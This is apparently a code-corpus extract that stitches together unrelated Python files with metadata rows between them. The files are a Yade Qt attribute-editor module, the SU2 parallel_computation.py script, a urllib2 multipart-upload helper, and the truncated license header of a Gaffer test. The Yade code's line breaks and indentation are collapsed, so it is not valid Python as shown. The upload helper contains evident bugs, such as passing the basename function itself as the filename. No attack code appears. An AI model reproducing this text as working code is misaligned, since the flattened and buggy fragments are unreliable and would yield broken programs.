(0,1,2)] except ValueError: self.refresh() qq=Quaternion(Vector3(q[0],q[1],q[2]),q[3]); qq.normalize() # from axis-angle self.trySetter((v,qq)) def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus() class AttrEditor_MatrixX(AttrEditor,QFrame): def __init__(self,parent,getter,setter,rows,cols,idxConverter): 'idxConverter converts row,col tuple to either (row,col), (col) etc depending on what access is used for []' AttrEditor.__init__(self,getter,setter) QFrame.__init__(self,parent) self.rows,self.cols=rows,cols self.idxConverter=idxConverter self.setContentsMargins(0,0,0,0) val=self.getter() self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0) for row,col in itertools.product(range(self.rows),range(self.cols)): w=QLineEdit('') self.grid.addWidget(w,row,col); w.textEdited.connect(self.isHot) w.selectionChanged.connect(self.isHot) w.editingFinished.connect(self.update) def refresh(self): val=self.getter() for row,col in itertools.product(range(self.rows),range(self.cols)): w=self.grid.itemAtPosition(row,col).widget() w.setText(str(val[self.idxConverter(row,col)])) if True or not w.hasFocus: w.home(False) # make the left-most part visible, if the text is wider than the widget def update(self): try: val=self.getter() for row,col in itertools.product(range(self.rows),range(self.cols)): w=self.grid.itemAtPosition(row,col).widget() if w.isModified(): val[self.idxConverter(row,col)]=float(w.text()) logging.debug('setting'+str(val)) self.trySetter(val) except ValueError: self.refresh() def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus() class AttrEditor_MatrixXi(AttrEditor,QFrame): def __init__(self,parent,getter,setter,rows,cols,idxConverter): 'idxConverter converts row,col tuple to either (row,col), (col) etc depending on what access is used for []' AttrEditor.__init__(self,getter,setter) QFrame.__init__(self,parent) self.rows,self.cols=rows,cols self.idxConverter=idxConverter self.setContentsMargins(0,0,0,0) self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0) for row,col in itertools.product(range(self.rows),range(self.cols)): w=QSpinBox() w.setRange(int(-1e9),int(1e9)); w.setSingleStep(1); self.grid.addWidget(w,row,col); self.refresh() # refresh before connecting signals! for row,col in itertools.product(range(self.rows),range(self.cols)): self.grid.itemAtPosition(row,col).widget().valueChanged.connect(self.update) def refresh(self): val=self.getter() for row,col in itertools.product(range(self.rows),range(self.cols)): w=self.grid.itemAtPosition(row,col).widget().setValue(val[self.idxConverter(row,col)]) def update(self): val=self.getter(); modified=False for row,col in itertools.product(range(self.rows),range(self.cols)): w=self.grid.itemAtPosition(row,col).widget() if w.value()!=val[self.idxConverter(row,col)]: modified=True; val[self.idxConverter(row,col)]=w.value() if not modified: return logging.debug('setting'+str(val)) self.trySetter(val) def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus() class AttrEditor_Vector6i(AttrEditor_MatrixXi): def __init__(self,parent,getter,setter): AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,6,lambda r,c:c) class AttrEditor_Vector3i(AttrEditor_MatrixXi): def __init__(self,parent,getter,setter): AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,3,lambda r,c:c) class AttrEditor_Vector2i(AttrEditor_MatrixXi): def __init__(self,parent,getter,setter): AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,2,lambda r,c:c) class AttrEditor_Vector6(AttrEditor_MatrixX): def __init__(self,parent,getter,setter): AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,6,lambda r,c:c) class AttrEditor_Vector3(AttrEditor_MatrixX): def __init__(self,parent,getter,setter): AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,3,lambda r,c:c) class AttrEditor_Vector2(AttrEditor_MatrixX): def __init__(self,parent,getter,setter): AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,2,lambda r,c:c) class AttrEditor_Matrix3(AttrEditor_MatrixX): def __init__(self,parent,getter,setter): AttrEditor_MatrixX.__init__(self,parent,getter,setter,3,3,lambda r,c:(r,c)) class Se3FakeType: pass _fundamentalEditorMap={bool:AttrEditor_Bool,str:AttrEditor_Str,int:AttrEditor_Int,float:AttrEditor_Float,Quaternion:AttrEditor_Quaternion,Vector2:AttrEditor_Vector2,Vector3:AttrEditor_Vector3,Vector6:AttrEditor_Vector6,Matrix3:AttrEditor_Matrix3,Vector6i:AttrEditor_Vector6i,Vector3i:AttrEditor_Vector3i,Vector2i:AttrEditor_Vector2i,Se3FakeType:AttrEditor_Se3} _fundamentalInitValues={bool:True,str:'',int:0,float:0.0,Quaternion:Quaternion((0,1,0),0.0),Vector3:Vector3.Zero,Matrix3:Matrix3.Zero,Vector6:Vector6.Zero,Vector6i:Vector6i.Zero,Vector3i:Vector3i.Zero,Vector2i:Vector2i.Zero,Vector2:Vector2.Zero,Se3FakeType:(Vector3.Zero,Quaternion((0,1,0),0.0))} class SerQLabel(QLabel): def __init__(self,parent,label,tooltip,path): QLabel.__init__(self,parent) self.path=path self.setText(label) if tooltip or path: self.setToolTip(('<b>'+path+'</b><br>' if self.path else '')+(tooltip if tooltip else '')) self.linkActivated.connect(yade.qt.openUrl) def mousePressEvent(self,event): if event.button()!=Qt.MidButton: event.ignore(); return # middle button clicked, paste pasteText to clipboard cb=QApplication.clipboard() cb.setText(self.path,mode=QClipboard.Clipboard) cb.setText(self.path,mode=QClipboard.Selection) # X11 global selection buffer event.accept() class SerializableEditor(QFrame): "Class displaying and modifying serializable attributes of a yade object." import collections import logging # each attribute has one entry associated with itself class EntryData: def __init__(self,name,T,flags=0): self.name,self.T,self.flags=name,T,flags self.lineNo,self.widget=None,None def __init__(self,ser,parent=None,ignoredAttrs=set(),showType=False,path=None): "Construct window, *ser* is the object we want to show." QtGui.QFrame.__init__(self,parent) self.ser=ser self.path=(ser.label if (hasattr(ser,'label') and ser.label) else path) self.showType=showType self.hot=False self.entries=[] self.ignoredAttrs=ignoredAttrs logging.debug('New Serializable of type %s'%ser.__class__.__name__) self.setWindowTitle(str(ser)) self.mkWidgets() self.refreshTimer=QTimer(self) self.refreshTimer.timeout.connect(self.refreshEvent) self.refreshTimer.start(500) def getListTypeFromDocstring(self,attr): "Guess type of array by scanning docstring for :yattrtype: and parsing its argument; ugly, but works." doc=getattr(self.ser.__class__,attr).__doc__ if doc==None: logging.error("Attribute %s has no docstring."%attr) return None m=re.search(r':yattrtype:`([^`]*)`',doc) if not m: logging.error("Attribute %s does not contain :yattrtype:`....` (docstring is '%s'"%(attr,doc)) return None cxxT=m.group(1) logging.debug('Got type "%s" from :yattrtype:'%cxxT) def vecTest(T,cxxT): #regexp=r'^\s*(std\s*::)?\s*vector\s*<\s*(std\s*::)?\s*('+T+r')\s*>\s*$' regexp=r'^\s*(std\s*::)?\s*vector\s*<\s*(shared_ptr\s*<\s*)?\s*(std\s*::)?\s*('+T+r')(\s*>)?\s*>\s*$' m=re.match(regexp,cxxT) return m vecMap={ 'bool':bool,'int':int,'long':int,'Body::id_t':long,'size_t':long, 'Real':float,'float':float,'double':float, 'Vector6r':Vector6,'Vector6i':Vector6i,'Vector3i':Vector3i,'Vector2r':Vector2,'Vector2i':Vector2i, 'Vector3r':Vector3,'Matrix3r':Matrix3,'Se3r':Se3FakeType, 'string':str, #'BodyCallback':BodyCallback, 'IntrCallback':IntrCallback,'BoundFunctor':BoundFunctor,'IGeomFunctor':IGeomFunctor,'IPhysFunctor':IPhysFunctor,'LawFunctor':LawFunctor,'KinematicEngine':KinematicEngine, 'GlShapeFunctor':GlShapeFunctor,'GlStateFunctor':GlStateFunctor,'GlIGeomFunctor':GlIGeomFunctor,'GlIPhysFunctor':GlIPhysFunctor,'GlBoundFunctor':GlBoundFunctor,'GlExtraDrawer':GlExtraDrawer } for T,ret in vecMap.items(): if vecTest(T,cxxT): logging.debug("Got type %s from cxx type %s"%(repr(ret),cxxT)) return (ret,) logging.error("Unable to guess python type from cxx type '%s'"%cxxT) return None def mkAttrEntries(self): if self.ser==None: return try: d=self.ser.dict() except TypeError: logging.error('TypeError when getting attributes of '+str(self.ser)+',skipping. ') import traceback traceback.print_exc() attrs=self.ser.dict().keys(); attrs.sort() for attr in attrs: val=getattr(self.ser,attr) # get the value using serattr, as it might be different from what the dictionary provides (e.g. Body.blockedDOFs) t=None doc=getattr(self.ser.__class__,attr).__doc__; if '|yhidden|' in doc: continue if attr in self.ignoredAttrs: continue if isinstance(val,list): t=self.getListTypeFromDocstring(attr) if not t and len(val)==0: t=(val[0].__class__,) # 1-tuple is list of the contained type #if not t: raise RuntimeError('Unable to guess type of '+str(self.ser)+'.'+attr) # hack for Se3, which is returned as (Vector3,Quaternion) in python elif isinstance(val,tuple) and len(val)==2 and val[0].__class__==Vector3 and val[1].__class__==Quaternion: t=Se3FakeType else: t=val.__class__ match=re.search(':yattrflags:`\s*([0-9]+)\s*`',doc) # non-empty attribute flags=int(match.group(1)) if match else 0 #logging.debug('Attr %s is of type %s'%(attr,((t[0].__name__,) if isinstance(t,tuple) else t.__name__))) self.entries.append(self.EntryData(name=attr,T=t)) def getDocstring(self,attr=None): "If attr is *None*, return docstring of the Serializable itself" doc=(getattr(self.ser.__class__,attr).__doc__ if attr else self.ser.__class__.__doc__) if not doc: return '' doc=re.sub(':y(attrtype|default|attrflags):`[^`]*`','',doc) statAttr=re.compile('^.. ystaticattr::.*$',re.MULTILINE|re.DOTALL) doc=re.sub(statAttr,'',doc) # static classes have their proper docs at the beginning, discard static memeber docs # static: attribute of the type is the same object as attribute of the instance # in that case, get docstring from the class documentation by parsing it if attr and getattr(self.ser.__class__,attr)==getattr(self.ser,attr): doc=self.getStaticAttrDocstring(attr) doc=re.sub(':yref:`([^`]*)`','\\1',doc) import textwrap wrapper=textwrap.TextWrapper(replace_whitespace=False) return wrapper.fill(textwrap.dedent(doc)) def getStaticAttrDocstring(self,attr): ret=''; c=self.ser.__class__ while hasattr(c,attr) and hasattr(c.__base__,attr): c=c.__base__ start='.. ystaticattr:: %s.%s('%(c.__name__,attr) if start in c.__doc__: ll=c.__doc__.split('\n') for i in range(len(ll)): if ll[i].startswith(start): break for i in range(i+1,len(ll)): if len(ll[i])>0 and ll[i][0] not in ' \t': break ret+=ll[i] return ret else: return '[no documentation found]' def mkWidget(self,entry): if not entry.T: return None # single fundamental object Klass=_fundamentalEditorMap.get(entry.T,None) getter,setter=lambda: getattr(self.ser,entry.name), lambda x: setattr(self.ser,entry.name,x) if Klass: widget=Klass(self,getter=getter,setter=setter) widget.setFocusPolicy(Qt.StrongFocus) if (entry.flags & AttrFlags.readonly): widget.setEnabled(False) return widget # sequences if entry.T.__class__==tuple: assert(len(entry.T)==1) # we don't handle tuples of other lenghts # sequence of serializables T=entry.T[0] if (issubclass(T,Serializable) or T==Serializable): widget=SeqSerializable(self,getter,setter,T,path=(self.path+'.'+entry.name if self.path else None),shrink=True) return widget if (T in _fundamentalEditorMap): widget=SeqFundamentalEditor(self,getter,setter,T) return widget return None # a serializable if issubclass(entry.T,Serializable) or entry.T==Serializable: obj=getattr(self.ser,entry.name) if hasattr(obj,'label') and obj.label: path=obj.label elif self.path: path=self.path+'.'+entry.name else: path=None widget=SerializableEditor(getattr(self.ser,entry.name),parent=self,showType=self.showType,path=(self.path+'.'+entry.name if self.path else None)) widget.setFrameShape(QFrame.Box); widget.setFrameShadow(QFrame.Raised); widget.setLineWidth(1) return widget return None def mkWidgets(self): self.mkAttrEntries() grid=QFormLayout() grid.setContentsMargins(2,2,2,2) grid.setVerticalSpacing(0) grid.setLabelAlignment(Qt.AlignRight) if self.showType: lab=SerQLabel(self,makeSerializableLabel(self.ser,addr=True,href=True),tooltip=self.getDocstring(),path=self.path) lab.setFrameShape(QFrame.Box); lab.setFrameShadow(QFrame.Sunken); lab.setLineWidth(2); lab.setAlignment(Qt.AlignHCenter); lab.linkActivated.connect(yade.qt.openUrl) grid.setWidget(0,QFormLayout.SpanningRole,lab) for entry in self.entries: entry.widget=self.mkWidget(entry) objPath=(self.path+'.'+entry.name) if self.path else None label=SerQLabel(self,serializableHref(self.ser,entry.name),tooltip=self.getDocstring(entry.name),path=objPath) grid.addRow(label,entry.widget if entry.widget else QLabel('<i>unhandled type</i>')) self.setLayout(grid) self.refreshEvent() def refreshEvent(self): for e in self.entries: if e.widget and not e.widget.hot: e.widget.refresh() def refresh(self): pass def makeSerializableLabel(ser,href=False,addr=True,boldHref=True,num=-1,count=-1): ret=u'' if num>=0: if count>=0: ret+=u'%d/%d. '%(num,count) else: ret+=u'%d. '%num if href: ret+=(u' <b>' if boldHref else u' ')+serializableHref(ser)+(u'</b> ' if boldHref else u' ') else: ret+=ser.__class__.__name__+' ' if hasattr(ser,'label') and ser.label: ret+=u' “'+unicode(ser.label)+u'”' # do not show address if there is a label already elif addr: import re ss=unicode(ser); m=re.match(u'<(.*) instance at (0x.*)>',ss) if m: ret+=m.group(2) else: logging.warning(u"Serializable converted to str ('%s') does not contain 'instance at 0x…'"%ss) return ret class SeqSerializableComboBox(QFrame): def __init__(self,parent,getter,setter,serType,path=None,shrink=False): QFrame.__init__(self,parent) self.getter,self.setter,self.serType,self.path,self.shrink=getter,setter,serType,path,shrink self.layout=QVBoxLayout(self) topLineFrame=QFrame(self) topLineLayout=QHBoxLayout(topLineFrame); for l in self.layout, topLineLayout: l.setSpacing(0); l.setContentsMargins(0,0,0,0) topLineFrame.setLayout(topLineLayout) buttons=(self.newButton,self.killButton,self.upButton,self.downButton)=[QPushButton(label,self) for label in (u'☘',u'☠',u'↑',u'↓')] buttonSlots=(self.newSlot,self.killSlot,self.upSlot,self.downSlot) # same order as buttons for b in buttons: b.setStyleSheet('QPushButton { font-size: 15pt; }'); b.setFixedWidth(30); b.setFixedHeight(30) self.combo=QComboBox(self) self.combo.setSizeAdjustPolicy(QComboBox.AdjustToContents) for w in buttons[0:2]+[self.combo,]+buttons[2:4]: topLineLayout.addWidget(w) self.layout.addWidget(topLineFrame) # nested layout self.scroll=QScrollArea(self); self.scroll.setWidgetResizable(True) self.layout.addWidget(self.scroll) self.seqEdit=None # currently edited serializable self.setLayout(self.layout) self.hot=None # API compat with SerializableEditor self.setFrameShape(QFrame.Box); self.setFrameShadow(QFrame.Raised); self.setLineWidth(1) # signals for b,slot in zip(buttons,buttonSlots): b.clicked.connect(slot) self.combo.currentIndexChanged.connect(self.comboIndexSlot) self.refreshEvent() # periodic refresh self.refreshTimer=QTimer(self) self.refreshTimer.timeout.connect(self.refreshEvent) self.refreshTimer.start(1000) # 1s should be enough #print 'SeqSerializable path is',self.path def comboIndexSlot(self,ix): # different seq item selected currSeq=self.getter(); if len(currSeq)==0: ix=-1 logging.debug('%s comboIndexSlot len=%d, ix=%d'%(self.serType.__name__,len(currSeq),ix)) self.downButton.setEnabled(ix<len(currSeq)-1) self.upButton.setEnabled(ix>0) self.combo.setEnabled(ix>=0) if ix>=0: ser=currSeq[ix] self.seqEdit=SerializableEditor(ser,parent=self,showType=seqSerializableShowType,path=(self.path+'['+str(ix)+']') if self.path else None) self.scroll.setWidget(self.seqEdit) if self.shrink: self.sizeHint=lambda: QSize(100,1000) self.scroll.sizeHint=lambda: QSize(100,1000) self.sizePolicy().setVerticalPolicy(QSizePolicy.Expanding) self.scroll.sizePolicy().setVerticalPolicy(QSizePolicy.Expanding) self.setMinimumHeight(min(300,self.seqEdit.height()+self.combo.height()+10)) self.setMaximumHeight(100000) self.scroll.setMaximumHeight(100000) else: self.scroll.setWidget(QFrame()) if self.shrink: self.setMaximumHeight(self.combo.height()+10); self.scroll.setMaximumHeight(0) def serLabel(self,ser,i=-1): return ('' if i<0 else str(i)+'. ')+str(ser)[1:-1].replace('instance at ','') def refreshEvent(self,forceIx=-1): currSeq=self.getter() comboEnabled=self.combo.isEnabled() if comboEnabled and len(currSeq)==0: self.comboIndexSlot(-1) # force refresh, otherwise would not happen from the initially empty state ix,cnt=self.combo.currentIndex(),self.combo.count() # serializable currently being edited (which can be absent) or the one of which index is forced ser=(self.seqEdit.ser if self.seqEdit else None) if forceIx<0 else currSeq[forceIx] if comboEnabled and len(currSeq)==cnt and (ix<0 or ser==currSeq[ix]): return if not comboEnabled and len(currSeq)==0: return logging.debug(self.serType.__name__+' rebuilding list from scratch') self.combo.clear() if len(currSeq)>0: prevIx=-1 for i,s in enumerate(currSeq): self.combo.addItem(makeSerializableLabel(s,num=i,count=len(currSeq),addr=False)) if s==ser: prevIx=i if forceIx>=0: newIx=forceIx # force the index (used from newSlot to make the new element active) elif prevIx>=0: newIx=prevIx # if found what was active before, use it elif ix>=0: newIx=ix # otherwise use the previous index (e.g. after deletion) else: newIx=0 # fallback to 0 logging.debug('%s setting index %d'%(self.serType.__name__,newIx)) self.combo.setCurrentIndex(newIx) else: logging.debug('%s EMPTY, setting index 0'%(self.serType.__name__)) self.combo.setCurrentIndex(-1) self.killButton.setEnabled(len(currSeq)>0) def newSlot(self): dialog=NewSerializableDialog(self,self.serType.__name__) if not dialog.exec_(): return # cancelled ser=dialog.result() ix=self.combo.currentIndex() currSeq=self.getter(); currSeq.insert(ix,ser); self.setter(currSeq) logging.debug('%s new item created at index %d'%(self.serType.__name__,ix)) self.refreshEvent(forceIx=ix) def killSlot(self): ix=self.combo.currentIndex() currSeq=self.getter(); del currSeq[ix]; self.setter(currSeq) self.refreshEvent() def upSlot(self): i=self.combo.currentIndex() assert(i>0) currSeq=self.getter(); prev,curr=currSeq[i-1:i+1]; currSeq[i-1],currSeq[i]=curr,prev; self.setter(currSeq) self.refreshEvent(forceIx=i-1) def downSlot(self): i=self.combo.currentIndex() currSeq=self.getter(); assert(i<len(currSeq)-1); curr,nxt=currSeq[i:i+2]; currSeq[i],currSeq[i+1]=nxt,curr; self.setter(currSeq) self.refreshEvent(forceIx=i+1) def refresh(self): pass # API compat with SerializableEditor SeqSerializable=SeqSerializableComboBox class NewFundamentalDialog(QDialog): def __init__(self,parent,attrName,typeObj,typeStr): QDialog.__init__(self,parent) self.setWindowTitle('%s (type %s)'%(attrName,typeStr)) self.layout=QVBoxLayout(self) self.scroll=QScrollArea(self) self.scroll.setWidgetResizable(True) self.buttons=QDialogButtonBox(QDialogButtonBox.Ok|QDialogButtonBox.Cancel); self.buttons.accepted.connect(self.accept) self.buttons.rejected.connect(self.reject) self.layout.addWidget(self.scroll) self.layout.addWidget(self.buttons) self.setWindowModality(Qt.WindowModal) class FakeObjClass: pass self.fakeObj=FakeObjClass() self.attrName=attrName Klass=_fundamentalEditorMap.get(typeObj,None) initValue=_fundamentalInitValues.get(typeObj,typeObj()) setattr(self.fakeObj,attrName,initValue) if Klass: self.widget=Klass(None,self.fakeObj,attrName) self.scroll.setWidget(self.widget) self.scroll.show() self.widget.refresh() else: raise RuntimeError("Unable to construct new dialog for type %s"%(typeStr)) def result(self): self.widget.update() return getattr(self.fakeObj,self.attrName) class NewSerializableDialog(QDialog): def __init__(self,parent,baseClassName,includeBase=True): import yade.system QDialog.__init__(self,parent) self.setWindowTitle('Create new object of type %s'%baseClassName) self.layout=QVBoxLayout(self) self.combo=QComboBox(self) childs=list(yade.system.childClasses(baseClassName,includeBase=False)); childs.sort() if includeBase: self.combo.addItem(baseClassName) self.combo.insertSeparator(1000) self.combo.addItems(childs) self.combo.currentIndexChanged.connect(self.comboSlot) self.scroll=QScrollArea(self) self.scroll.setWidgetResizable(True) self.buttons=QDialogButtonBox(QDialogButtonBox.Ok|QDialogButtonBox.Cancel); self.buttons.accepted.connect(self.accept) self.buttons.rejected.connect(self.reject) self.layout.addWidget(self.combo) self.layout.addWidget(self.scroll) self.layout.addWidget(self.buttons) self.ser=None self.combo.setCurrentIndex(0); self.comboSlot(0) self.setWindowModality(Qt.WindowModal) def comboSlot(self,index): item=str(self.combo.itemText(index)) self.ser=eval(item+'()') self.scroll.setWidget(SerializableEditor(self.ser,self.scroll,showType=True)) self.scroll.show() def result(self): return self.ser def sizeHint(self): return QSize(180,400) class SeqFundamentalEditor(QFrame): def __init__(self,parent,getter,setter,itemType): QFrame.__init__(self,parent) self.getter,self.setter,self.itemType=getter,setter,itemType self.layout=QVBoxLayout() topLineFrame=QFrame(self); topLineLayout=QHBoxLayout(topLineFrame) self.form=QFormLayout() self.form.setContentsMargins(0,0,0,0) self.form.setVerticalSpacing(0) self.form.setLabelAlignment(Qt.AlignLeft) self.formFrame=QFrame(self); self.formFrame.setLayout(self.form) self.layout.addWidget(self.formFrame) self.setLayout(self.layout) # SerializableEditor API compat self.hot=False self.rebuild() # periodic refresh self.refreshTimer=QTimer(self) self.refreshTimer.timeout.connect(self.refreshEvent) self.refreshTimer.start(1000) # 1s should be enough def contextMenuEvent(self, event): index=self.localPositionToIndex(event.pos()) seq=self.getter() if len(seq)==0: index=-1 field=self.form.itemAt(index,QFormLayout.LabelRole).widget() if index>=0 else None menu=QMenu(self) actNew,actKill,actUp,actDown=[menu.addAction(name) for name in (u'☘ New',u'☠ Remove',u'↑ Up',u'↓ Down')] if index<0: [a.setEnabled(False) for a in actKill,actUp,actDown] if index==len(seq)-1: actDown.setEnabled(False) if index==0: actUp.setEnabled(False) if field: field.setStyleSheet('QWidget { background: green }') act=menu.exec_(self.mapToGlobal(event.pos())) if field: field.setStyleSheet('QWidget { background: none }') if not act: return if act==actNew: self.newSlot(index) elif act==actKill: self.killSlot(index) elif act==actUp: self.upSlot(index) elif act==actDown: self.downSlot(index) def localPositionToIndex(self,pos): gp=self.mapToGlobal(pos) for row in range(self.form.count()/2): w,i=self.form.itemAt(row,QFormLayout.FieldRole),self.form.itemAt(row,QFormLayout.LabelRole) for wi in w.widget(),i.widget(): x0,y0,x1,y1=wi.geometry().getCoords(); globG=QRect(self.mapToGlobal(QPoint(x0,y0)),self.mapToGlobal(QPoint(x1,y1))) if globG.contains(gp): return row return -1 def newSlot(self,i): seq=self.getter(); seq.insert(i,_fundamentalInitValues.get(self.itemType,self.itemType())) self.setter(seq) self.rebuild() def killSlot(self,i): seq=self.getter(); assert(i<len(seq)); del seq[i]; self.setter(seq) self.refreshEvent() def upSlot(self,i): seq=self.getter(); assert(i<len(seq)); prev,curr=seq[i-1:i+1]; seq[i-1],seq[i]=curr,prev; self.setter(seq) self.refreshEvent(forceIx=i-1) def downSlot(self,i): seq=self.getter(); assert(i<len(seq)-1); curr,nxt=seq[i:i+2]; seq[i],seq[i+1]=nxt,curr; self.setter(seq) self.refreshEvent(forceIx=i+1) def rebuild(self): currSeq=self.getter() # clear everything rows=self.form.count()/2 for row in range(rows): logging.trace('counts',self.form.rowCount(),self.form.count()) for wi in self.form.itemAt(row,QFormLayout.FieldRole),self.form.itemAt(row,QFormLayout.LabelRole): self.form.removeItem(wi) logging.trace('deleting widget',wi.widget()) widget=wi.widget(); widget.hide(); del widget # for some reason, deleting does not make the thing disappear visually; hiding does, however logging.trace('counts after ',self.form.rowCount(),self.form.count()) logging.debug('cleared') # add everything Klass=_fundamentalEditorMap.get(self.itemType,None) if not Klass: errMsg=QTextEdit(self) errMsg.setReadOnly(True); errMsg.setText("Sorry, editing sequences of %s's is not (yet?) implemented."%(self.itemType.__name__)) self.form.insertRow(0,'<b>Error</b>',errMsg) return class ItemGetter(): def __init__(self,getter,index): self.getter,self.index=getter,index def __call__(self): return self.getter()[self.index] class ItemSetter(): def __init__(self,getter,setter,index): self.getter,self.setter,self.index=getter,setter,index def __call__(self,val): seq=self.getter(); seq[self.index]=val; self.setter(seq) for i,item in enumerate(currSeq): widget=Klass(self,ItemGetter(self.getter,i),ItemSetter(self.getter,self.setter,i)) #proxy,'value') self.form.insertRow(i,'%d. '%i,widget) logging.debug('added item %d %s'%(i,str(widget))) if len(currSeq)==0: self.form.insertRow(0,'<i>empty</i>',QLabel('<i>(right-click for menu)</i>')) logging.debug('rebuilt, will refresh now') self.refreshEvent(dontRebuild=True) # avoid infinite recursion it the length would change meanwhile def refreshEvent(self,dontRebuild=False,forceIx=-1): currSeq=self.getter() if len(currSeq)!=self.form.count()/2: #rowCount(): if dontRebuild: return # length changed behind our back, just pretend nothing happened and update next time instead self.rebuild() currSeq=self.getter() for i in range(len(currSeq)): item=self.form.itemAt(i,QFormLayout.FieldRole) logging.trace('got item #%d %s'%(i,str(item.widget()))) widget=item.widget() if not widget.hot: widget.refresh() if forceIx>=0 and forceIx==i: widget.setFocus() def refresh(self): pass # SerializableEditor API
gpl-2.0
-7,651,492,641,948,851,000
44.41601
360
0.727223
false
chenbojian/SU2
SU2_PY/parallel_computation.py
1
3981
#!/usr/bin/env python ## \file parallel_computation.py # \brief Python script for doing the continuous adjoint computation using the SU2 suite. # \author T. Economon, T. Lukaczyk, F. Palacios # \version 3.2.9 "eagle" # # SU2 Lead Developers: Dr. Francisco Palacios ([email protected]). # Dr. Thomas D. Economon ([email protected]). # # SU2 Developers: Prof. Juan J. Alonso's group at Stanford University. # Prof. Piero Colonna's group at Delft University of Technology. # Prof. Nicolas R. Gauger's group at Kaiserslautern University of Technology. # Prof. Alberto Guardone's group at Polytechnic University of Milan. # Prof. Rafael Palacios' group at Imperial College London. # # Copyright (C) 2012-2015 SU2, the open-source CFD code. # # SU2 is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # SU2 is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with SU2. If not, see <http://www.gnu.org/licenses/>. import os, sys, shutil, copy from optparse import OptionParser sys.path.append(os.environ['SU2_RUN']) import SU2 # ------------------------------------------------------------------- # Main # ------------------------------------------------------------------- def main(): # Command Line Options parser=OptionParser() parser.add_option("-f", "--file", dest="filename", help="read config from FILE", metavar="FILE") parser.add_option("-n", "--partitions", dest="partitions", default=2, help="number of PARTITIONS", metavar="PARTITIONS") parser.add_option("-c", "--compute", dest="compute", default="True", help="COMPUTE direct and adjoint problem", metavar="COMPUTE") (options, args)=parser.parse_args() options.partitions = int( options.partitions ) options.compute = options.compute.upper() == 'TRUE' if options.filename == None: raise Exception("No config file provided. Use -f flag") parallel_computation( options.filename , options.partitions , options.compute ) #: def main() # ------------------------------------------------------------------- # CFD Solution # ------------------------------------------------------------------- def parallel_computation( filename , partitions = 0 , compute = True ): # Config config = SU2.io.Config(filename) config.NUMBER_PART = partitions # State state = SU2.io.State() # check for existing files if not compute: state.find_files(config) else: state.FILES.MESH = config.MESH_FILENAME # CFD Solution (direct or adjoint) info = SU2.run.CFD(config) state.update(info) # Solution merging if config.MATH_PROBLEM == 'DIRECT': config.SOLUTION_FLOW_FILENAME = config.RESTART_FLOW_FILENAME elif config.MATH_PROBLEM == 'ADJOINT': config.SOLUTION_ADJ_FILENAME = config.RESTART_ADJ_FILENAME info = SU2.run.merge(config) state.update(info) return state #: parallel_computation() # ------------------------------------------------------------------- # Run Main Program # ------------------------------------------------------------------- # this is only accessed if running from command prompt if __name__ == '__main__': main()
lgpl-2.1
-5,888,083,821,132,230,000
34.864865
93
0.567445
false
donaldharvey/snappy
snappy/utils.py
1
2623
import urllib2 import urllib import os from mimetools import choose_boundary from mimetypes import guess_type import stat class Singleton(type): def __init__(self, name, bases, dict): super(Singleton, self).__init__(name, bases, dict) self.instance = None def __call__(self, *args, **kw): if self.instance is None: self.instance = super(Singleton, self).__call__(*args, **kw) return self.instance class MultipartDataHandler(urllib2.BaseHandler): """ A urllib2-based multipart/form-data poster, adapted slightly from http://odin.himinbi.org/MultipartPostHandler.py and http://code.activestate.com/recipes/146306/. """ handler_order = urllib2.HTTPHandler.handler_order - 20 def http_request(self, request): data = request.get_data() if data is not None and data is not str: fields, files = [], [] for key, value in data.items(): if type(value) == file: files.append((key, value)) else: fields.append((key, value)) if not len(files): # no files, so go straight ahead and encode the data data = urllib.urlencode(fields, True) else: content_type, data = self._encode_multipart_formdata(fields, files) req_content_type = request.get_header('Content-Type', '') if 'multipart/form-data' in req_content_type: request.set_header('Content-Type', content_type) else: request.add_unredirected_header('Content-Type', content_type) request.add_data(data) return request https_request = http_request def _encode_multipart_formdata(self, fields, files): """ fields is a sequence of (name, value) elements for regular form fields. files is a sequence of (name, filename, value) elements for data to be uploaded as files Return (content_type, body) ready for httplib.HTTP instance """ boundary = choose_boundary() CRLF = '\r\n' L = [] for (key, value) in fields: L.append('--' + boundary) L.append('Content-Disposition: form-data; name="%s"' % str(key)) L.append('') L.append(str(value)) for (key, fd) in files: L.append('--' + boundary) filename = os.path.basename(fd.name) filesize = os.fstat(fd.fileno())[stat.ST_SIZE] L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (str(key), str(os.path.basename))) mimetype = guess_type(filename)[0] or 'application/octet-stream' L.append('Content-Type: %s' % mimetype) L.append('Content-Length: %s' % filesize) L.append('') fd.seek(0) L.append(fd.read()) L.append('--' + boundary + '--') L.append('') body = CRLF.join(L) contenttype = 'multipart/form-data; boundary=%s' % boundary return contenttype, body
gpl-3.0
9,019,982,423,787,834,000
32.202532
107
0.676706
false
chippey/gaffer
python/GafferTest/UndoTest.py
1
5828
########################################################################## # # Copyright (c) 2011-2012, John Haddon. All rights reserved. # Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above # copyright notice, this list of conditions and the following # disclaimer. # # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided with # the distribution. # # * Neither the name of John Haddon nor the names of # any other contributors to this software may be used to endorse or # promote products derived from this software without specific prior # written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # 